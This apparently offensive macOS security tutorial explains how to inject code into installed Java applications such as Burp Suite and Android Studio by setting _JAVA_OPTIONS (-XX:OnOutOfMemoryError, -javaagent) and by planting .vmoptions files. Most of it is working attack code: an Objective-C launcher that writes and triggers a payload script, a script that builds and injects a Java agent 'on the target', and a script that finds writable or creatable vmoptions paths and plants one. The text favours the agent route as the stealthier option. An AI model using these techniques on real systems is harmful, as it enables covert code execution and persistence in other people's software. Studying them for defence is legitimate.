Find the Java applications installed on the system. Java apps tend to carry Java-specific keys in their Info.plist whose values contain the string `java.`, so you can grep for that:
# Search only in /Applications folder
sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
# Full search
sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
_JAVA_OPTIONS
The environment variable _JAVA_OPTIONS is read by the JVM at startup and can be used to inject arbitrary Java parameters into the execution of a Java-compiled app. The example below caps the heap at 5 MB so the app runs out of memory immediately, and uses -XX:OnOutOfMemoryError to make the JVM run a command of your choice when that happens:
# Write your payload in a script called /tmp/payload.sh (and make it executable)
export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
To launch it as a new process (via `open`) rather than as a child of the current terminal you can use:
#import <Foundation/Foundation.h>

// clang -fobjc-arc -framework Foundation invoker.m -o invoker

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // Specify the file path and content
        NSString *filePath = @"/tmp/payload.sh";
        NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
        NSError *error = nil;

        // Write content to the file
        BOOL success = [content writeToFile:filePath
                                 atomically:YES
                                   encoding:NSUTF8StringEncoding
                                      error:&error];
        if (!success) {
            NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
            return 1;
        }
        NSLog(@"File written successfully to %@", filePath);

        // Mark the script executable: the JVM hands the OnOutOfMemoryError command
        // to the shell, so a script without the execute bit would simply fail to run
        NSDictionary *attrs = @{ NSFilePosixPermissions: @0755 };
        if (![[NSFileManager defaultManager] setAttributes:attrs ofItemAtPath:filePath error:&error]) {
            NSLog(@"Error setting permissions on %@\n%@", filePath, [error localizedDescription]);
            return 1;
        }

        // Create a new task
        NSTask *task = [[NSTask alloc] init];
        // Set the task's launch path to use the 'open' command
        [task setLaunchPath:@"/usr/bin/open"];
        // Arguments for the 'open' command, specifying the path to Android Studio
        [task setArguments:@[@"/Applications/Android Studio.app"]];

        // Define custom environment variables
        NSDictionary *customEnvironment = @{
            @"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
        };
        // Get the current environment and merge it with custom variables
        NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
        [environment addEntriesFromDictionary:customEnvironment];
        // Set the task's environment
        [task setEnvironment:environment];

        // Launch the task
        [task launch];
    }
    return 0;
}
However, that approach is noisy: the application dies with an OutOfMemoryError right after the payload runs. A stealthier way is to build a Java agent, which is loaded into the same JVM before the app's main() and leaves the app running normally:
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
# Or
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
Note: building the agent with a different Java version than the one the application bundles can crash both the agent and the application when the agent is loaded. Compile it with the JDK matching the target's runtime.
Then set the environment variable and run the Java application, for example:
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
# Or
open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
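The page does not show the agent itself, so here is an added example (not code from the original page or from Burp Suite) of the full procedure: write a minimal agent with premain/agentmain, package it with the manifest entries the JVM looks for, and inject it through _JAVA_OPTIONS. The work directory /tmp/j, the jar name Agent.jar, the payload (a touch of /tmp/agent-ran) and the target bundle name "Burp Suite Professional" are assumptions for illustration; javac and jar are expected on PATH.

```shell
# Added example: build a Java agent and inject it into a macOS Java app via _JAVA_OPTIONS.
# Assumptions: work dir /tmp/j, jar /tmp/j/Agent.jar, a JDK on PATH whose major version
# matches the target app's runtime (a mismatch can crash both agent and app).
set -eu

AGENT_DIR="${AGENT_DIR:-/tmp/j}"

# Write Agent.java and manifest.txt into DIR.
write_agent_sources() {
    local dir="$1"
    mkdir -p "$dir"
    cat > "$dir/Agent.java" <<'EOF'
import java.io.IOException;
import java.lang.instrument.Instrumentation;

public class Agent {
    // Runs inside the target JVM before the application's main() when loaded with -javaagent.
    public static void premain(String args, Instrumentation inst) {
        run();
    }

    // Entry point used if the agent is instead loaded into a running JVM via the Attach API.
    public static void agentmain(String args, Instrumentation inst) {
        run();
    }

    private static void run() {
        try {
            // Example payload (assumption): drop a marker file. Replace with what you need.
            new ProcessBuilder("/usr/bin/touch", "/tmp/agent-ran").start();
        } catch (IOException e) {
            // Stay quiet: an exception here would surface as an error in the host app.
        }
    }
}
EOF
    # The manifest tells the JVM which class carries premain (and agentmain).
    printf 'Premain-Class: Agent\nAgent-Class: Agent\n' > "$dir/manifest.txt"
}

# Compile and package the agent; prints the jar path.
build_agent() {
    local dir="$1"
    ( cd "$dir" && javac Agent.java && jar cmf manifest.txt Agent.jar Agent.class )
    echo "$dir/Agent.jar"
}

# Inject by pointing _JAVA_OPTIONS at the jar. `open --env` launches the app through
# LaunchServices, so it is not a child of this terminal.
inject_agent() {
    local jar="$1" app="$2"
    open --env "_JAVA_OPTIONS=-javaagent:$jar" -a "$app"
}

# Only build when a JDK is present; the source/manifest writer works without one.
if command -v javac >/dev/null 2>&1; then
    write_agent_sources "$AGENT_DIR"
    JAR=$(build_agent "$AGENT_DIR")
    echo "built $JAR"
    # inject_agent "$JAR" "Burp Suite Professional"   # run on the target host
fi
```

Usage: run the script on the target, then call inject_agent with the jar and the app name; the marker file /tmp/agent-ran appearing while the app keeps running confirms the agent executed inside the app's JVM.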
vmoptions file
This file lets Java parameters be specified for a particular application when its JVM starts, so any of the previous tricks (for example -javaagent or -XX:OnOutOfMemoryError) can be written into it to make the process execute arbitrary commands.
Moreover, a vmoptions file can pull in other files through an include directive, so modifying an included file is enough as well.
Finally, some Java applications will load more than one vmoptions file, which multiplies the candidate locations to check for write access.
Some applications, such as Android Studio, print in their output where they look for these files, like:
If they don't, you can easily check with eslogger (the Terminal needs Full Disk Access for this):
# Monitor
sudo eslogger lookup | grep vmoption
# Give FDA to the Terminal
# Launch the Java app
/Applications/Android\ Studio.app/Contents/MacOS/studio
Note how interesting it is that Android Studio in this example tries to load the file /Applications/Android Studio.app.vmoptions, which does not normally exist, in a location where any user in the admin group has write access and can therefore create it.
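The practical check that follows from this is to go through every vmoptions path an app probes and classify it: already writable, creatable because the parent directory is writable (the Android Studio case above), or out of reach. The following is an added example, not code from the original page or from Android Studio; the candidate paths other than /Applications/Android Studio.app.vmoptions and the jar path /tmp/Agent.jar are assumptions for illustration, and the real list should be taken from the app's startup output or from the eslogger trace above.

```shell
# Added example: classify candidate .vmoptions paths by whether the current user can
# plant a file there, then write one that loads an agent.
# Assumed paths: the candidate list below and the agent jar /tmp/Agent.jar.

# Prints one of: WRITABLE (exists, writable), READONLY (exists, not writable),
# CREATABLE (missing, but the parent directory is writable), MISSING (neither).
check_vmoptions_path() {
    local path="$1" dir
    if [ -e "$path" ]; then
        if [ -w "$path" ]; then echo "WRITABLE $path"; else echo "READONLY $path"; fi
    else
        dir=$(dirname "$path")
        if [ -d "$dir" ] && [ -w "$dir" ]; then echo "CREATABLE $path"; else echo "MISSING $path"; fi
    fi
}

# Write a vmoptions file whose only option loads the agent jar; the JVM reads one
# option per line, so no quoting is needed.
plant_vmoptions() {
    local path="$1" jar="$2"
    printf '%s\n' "-javaagent:$jar" > "$path"
}

# Candidate locations (assumptions; the page itself names only the first one).
for p in "/Applications/Android Studio.app.vmoptions" \
         "/Applications/Android Studio.app/Contents/bin/studio.vmoptions" \
         "${HOME:-/tmp}/Library/Application Support/Google/AndroidStudio/studio.vmoptions"; do
    check_vmoptions_path "$p"
done
# On the target, pick a CREATABLE or WRITABLE path and plant it, e.g.:
# plant_vmoptions "/Applications/Android Studio.app.vmoptions" /tmp/Agent.jar
```

A CREATABLE result on a system path is the interesting finding: the app will read a file that nobody has shipped yet, and an admin-group user can create it without touching the bundle itself.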